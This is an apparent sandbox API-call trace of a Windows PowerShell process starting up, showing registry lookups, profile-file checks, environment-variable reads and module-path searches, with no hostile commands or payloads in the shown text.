	[0388.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0388.643] VirtualQuery (in: lpAddress=0x14ba00, lpBuffer=0x14c8c0, dwLength=0x30 | out: lpBuffer=0x14c8c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.643] VirtualQuery (in: lpAddress=0x14b250, lpBuffer=0x14c110, dwLength=0x30 | out: lpBuffer=0x14c110*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.643] VirtualQuery (in: lpAddress=0x14b250, lpBuffer=0x14c110, dwLength=0x30 | out: lpBuffer=0x14c110*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0388.644] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d858 | out: phkResult=0x14d858*=0x330) returned 0x0
	[0388.644] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7dc, lpData=0x0, lpcbData=0x14d7d8*=0x0 | out: lpType=0x14d7dc*=0x1, lpData=0x0, lpcbData=0x14d7d8*=0x56) returned 0x0
	[0388.644] CoTaskMemAlloc (cb=0x5a) returned 0x1b727bf0
	[0388.644] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7ac, lpData=0x1b727bf0, lpcbData=0x14d7a8*=0x56 | out: lpType=0x14d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d7a8*=0x56) returned 0x0
	[0388.645] CoTaskMemFree (pv=0x1b727bf0) 
	[0388.645] RegCloseKey (hKey=0x330) returned 0x0
	[0388.645] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d858 | out: phkResult=0x14d858*=0x330) returned 0x0
	[0388.645] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7dc, lpData=0x0, lpcbData=0x14d7d8*=0x0 | out: lpType=0x14d7dc*=0x1, lpData=0x0, lpcbData=0x14d7d8*=0x56) returned 0x0
	[0388.645] CoTaskMemAlloc (cb=0x5a) returned 0x1b727bf0
	[0388.645] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d7ac, lpData=0x1b727bf0, lpcbData=0x14d7a8*=0x56 | out: lpType=0x14d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d7a8*=0x56) returned 0x0
	[0388.645] CoTaskMemFree (pv=0x1b727bf0) 
	[0388.645] RegCloseKey (hKey=0x330) returned 0x0
	[0388.646] CoTaskMemAlloc (cb=0x20c) returned 0x1b6f8970
	[0388.646] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6f8970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0388.646] CoTaskMemFree (pv=0x1b6f8970) 
	[0388.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0388.646] CoTaskMemAlloc (cb=0x20c) returned 0x1b6f8970
	[0388.646] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6f8970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0388.646] CoTaskMemFree (pv=0x1b6f8970) 
	[0388.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0388.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0388.647] SetErrorMode (uMode=0x1) returned 0x1
	[0388.647] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d7c0 | out: lpFileInformation=0x14d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.647] SetErrorMode (uMode=0x1) returned 0x1
	[0388.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0388.648] SetErrorMode (uMode=0x1) returned 0x1
	[0388.648] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d7c0 | out: lpFileInformation=0x14d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.648] SetErrorMode (uMode=0x1) returned 0x1
	[0388.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0388.648] SetErrorMode (uMode=0x1) returned 0x1
	[0388.648] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d7c0 | out: lpFileInformation=0x14d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.648] SetErrorMode (uMode=0x1) returned 0x1
	[0388.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0388.648] SetErrorMode (uMode=0x1) returned 0x1
	[0388.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d7c0 | out: lpFileInformation=0x14d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.649] SetErrorMode (uMode=0x1) returned 0x1
	[0388.649] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.649] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.650] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.650] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.650] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.650] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.651] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.651] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.655] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.655] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1d4
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0388.656] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378
	[0388.657] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x308
	[0388.657] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0388.657] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0388.657] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0388.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0388.658] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0388.659] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0388.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14d9a0 | out: lpMode=0x14d9a0) returned 1
	[0389.256] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.256] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.259] SetEvent (hEvent=0x300) returned 1
	[0389.259] SetEvent (hEvent=0x330) returned 1
	[0389.259] SetEvent (hEvent=0x334) returned 1
	[0389.259] SetEvent (hEvent=0x338) returned 1
	[0389.259] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0389.261] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.261] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.261] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6f8 | out: phkResult=0x14d6f8*=0x350) returned 0x0
	[0389.262] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d67c, lpData=0x0, lpcbData=0x14d678*=0x0 | out: lpType=0x14d67c*=0x0, lpData=0x0, lpcbData=0x14d678*=0x0) returned 0x2

Thread:
	id = 184
	os_tid = 0x178


Thread:
	id = 189
	os_tid = 0x56c


Thread:
	id = 367
	os_tid = 0x3ec


Thread:
	id = 393
	os_tid = 0x1010


Thread:
	id = 394
	os_tid = 0x1014

	[0360.716] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0373.934] LocalFree (hMem=0x387280) returned 0x0
	[0373.934] CloseHandle (hObject=0x31c) returned 1
	[0373.934] CloseHandle (hObject=0x13) returned 1
	[0373.935] CloseHandle (hObject=0xf) returned 1
	[0373.936] RegCloseKey (hKey=0x308) returned 0x0
	[0373.936] RegCloseKey (hKey=0x304) returned 0x0
	[0373.936] RegCloseKey (hKey=0x300) returned 0x0
	[0373.936] LocalFree (hMem=0x387250) returned 0x0
	[0373.936] RegCloseKey (hKey=0x32c) returned 0x0
	[0378.053] RegCloseKey (hKey=0x32c) returned 0x0
	[0382.250] RegCloseKey (hKey=0x304) returned 0x0
	[0382.250] RegCloseKey (hKey=0x1d0) returned 0x0
	[0382.250] RegCloseKey (hKey=0x1d4) returned 0x0
	[0382.250] RegCloseKey (hKey=0x32c) returned 0x0
	[0382.250] RegCloseKey (hKey=0x300) returned 0x0
	[0382.250] RegCloseKey (hKey=0x338) returned 0x0
	[0382.251] RegCloseKey (hKey=0x334) returned 0x0
	[0382.251] RegCloseKey (hKey=0x330) returned 0x0
	[0382.251] RegCloseKey (hKey=0x31c) returned 0x0
	[0382.251] RegCloseKey (hKey=0x308) returned 0x0
	[0385.916] RegCloseKey (hKey=0x370) returned 0x0
	[0385.916] RegCloseKey (hKey=0x36c) returned 0x0
	[0385.916] RegCloseKey (hKey=0x368) returned 0x0
	[0385.916] RegCloseKey (hKey=0x364) returned 0x0
	[0385.917] RegCloseKey (hKey=0x304) returned 0x0
	[0385.917] RegCloseKey (hKey=0x37c) returned 0x0
	[0385.917] RegCloseKey (hKey=0x35c) returned 0x0
	[0385.918] RegCloseKey (hKey=0x358) returned 0x0
	[0385.918] RegCloseKey (hKey=0x354) returned 0x0
	[0385.918] RegCloseKey (hKey=0x350) returned 0x0
	[0385.918] RegCloseKey (hKey=0x34c) returned 0x0
	[0385.919] RegCloseKey (hKey=0x348) returned 0x0
	[0385.919] RegCloseKey (hKey=0x344) returned 0x0
	[0385.919] RegCloseKey (hKey=0x308) returned 0x0
	[0385.919] RegCloseKey (hKey=0x378) returned 0x0
	[0385.919] RegCloseKey (hKey=0x374) returned 0x0
	[0385.919] RegCloseKey (hKey=0x1d0) returned 0x0
	[0385.920] RegCloseKey (hKey=0x1d4) returned 0x0
	[0385.920] RegCloseKey (hKey=0x32c) returned 0x0
	[0385.920] RegCloseKey (hKey=0x300) returned 0x0
	[0385.920] RegCloseKey (hKey=0x338) returned 0x0
	[0385.920] RegCloseKey (hKey=0x334) returned 0x0
	[0385.921] RegCloseKey (hKey=0x330) returned 0x0
	[0385.921] RegCloseKey (hKey=0x31c) returned 0x0
	[0641.483] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 518
	os_tid = 0x12e8


Thread:
	id = 542
	os_tid = 0x13bc

	[0389.948] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0389.952] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0389.957] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.957] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.959] VirtualQuery (in: lpAddress=0x1c7fdb00, lpBuffer=0x1c7fe9c0, dwLength=0x30 | out: lpBuffer=0x1c7fe9c0*(BaseAddress=0x1c7fd000, AllocationBase=0x1be70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0389.961] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.961] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.964] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.964] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.966] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.967] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.980] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.980] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.982] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.982] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0389.984] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0389.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0389.984] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.431] VirtualQuery (in: lpAddress=0x1c7fddb0, lpBuffer=0x1c7fec70, dwLength=0x30 | out: lpBuffer=0x1c7fec70*(BaseAddress=0x1c7fd000, AllocationBase=0x1be70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0390.431] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.431] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.433] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.434] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.434] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.434] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.435] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.435] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.439] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.439] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.957] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.957] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.959] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.959] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.961] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.961] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.964] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.964] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.965] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.965] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.967] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.967] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0390.969] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0390.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.969] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0391.413] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0391.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.413] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0392.004] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0392.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0392.004] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0392.007] CoTaskMemAlloc (cb=0x104) returned 0x1b6ffcf0
	[0392.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b6ffcf0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0392.007] CoTaskMemFree (pv=0x1b6ffcf0) 
	[0392.007] CoTaskMemAlloc (cb=0x128) returned 0x3e64d0
	[0392.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3e64d0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0392.007] CoTaskMemFree (pv=0x3e64d0) 
	[0392.012] CoTaskMemAlloc (cb=0x20e) returned 0x1b6fa5e0
	[0392.012] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b6fa5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0392.012] CoTaskMemFree (pv=0x1b6fa5e0) 
	[0392.016] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.017] SetErrorMode (uMode=0x1) returned 0x1
	[0392.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0392.030] SetErrorMode (uMode=0x1) returned 0x1
	[0392.536] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.536] SetErrorMode (uMode=0x1) returned 0x1
	[0392.536] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0392.544] SetErrorMode (uMode=0x1) returned 0x1
	[0392.545] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0392.545] SetErrorMode (uMode=0x1) returned 0x1
	[0392.545] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0392.553] SetErrorMode (uMode=0x1) returned 0x1
